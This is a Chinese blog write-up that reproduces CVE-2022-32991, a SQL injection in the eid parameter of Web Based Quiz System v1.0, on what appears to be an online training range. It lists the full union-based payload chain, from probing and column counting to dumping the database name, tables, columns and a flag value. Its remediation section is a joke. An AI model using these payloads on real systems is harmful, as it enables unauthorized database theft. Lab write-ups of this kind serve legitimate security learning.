[漏洞复现]Web Based Quiz System(CVE-2022-32991)

一、漏洞情况分析

Web Based Quiz System v1.0版本存在SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令窃取数据库敏感数据。

二、漏洞复现

春秋云境.com一键梭哈,复制粘贴直接拿下

[漏洞复现]Web Based Quiz System(CVE-2022-32991)_第1张图片

开启场景“启动原神”

[漏洞复现]Web Based Quiz System(CVE-2022-32991)_第2张图片

[漏洞复现]Web Based Quiz System(CVE-2022-32991)_第3张图片

[漏洞复现]Web Based Quiz System(CVE-2022-32991)_第4张图片

[漏洞复现]Web Based Quiz System(CVE-2022-32991)_第5张图片

[漏洞复现]Web Based Quiz System(CVE-2022-32991)_第6张图片

ok,点完鼠标我们开始ctrl+c,ctrl+v

这里加  '  ,会吧,不会退学吧

[漏洞复现]Web Based Quiz System(CVE-2022-32991)_第7张图片

这里加--+

[漏洞复现]Web Based Quiz System(CVE-2022-32991)_第8张图片

知道你们懒给你们打出来,数字自己换

order by 6

[漏洞复现]Web Based Quiz System(CVE-2022-32991)_第9张图片

[漏洞复现]Web Based Quiz System(CVE-2022-32991)_第10张图片

union select 1,2,3,4,5

[漏洞复现]Web Based Quiz System(CVE-2022-32991)_第11张图片

union select 1,2,database(),4,5

[漏洞复现]Web Based Quiz System(CVE-2022-32991)_第12张图片

union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()

[漏洞复现]Web Based Quiz System(CVE-2022-32991)_第13张图片

union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema=database() and table_name="flag"

[漏洞复现]Web Based Quiz System(CVE-2022-32991)_第14张图片

union select 1,2,group_concat(flag),4,5 from flag

[漏洞复现]Web Based Quiz System(CVE-2022-32991)_第15张图片

三、漏洞处置建议

既然要我说两句,那我就简单的说两句吧。

1、你可以断网

2、你可以关靶场

ok说完了

你可能感兴趣的:(漏洞复现,春秋云境靶场,安全)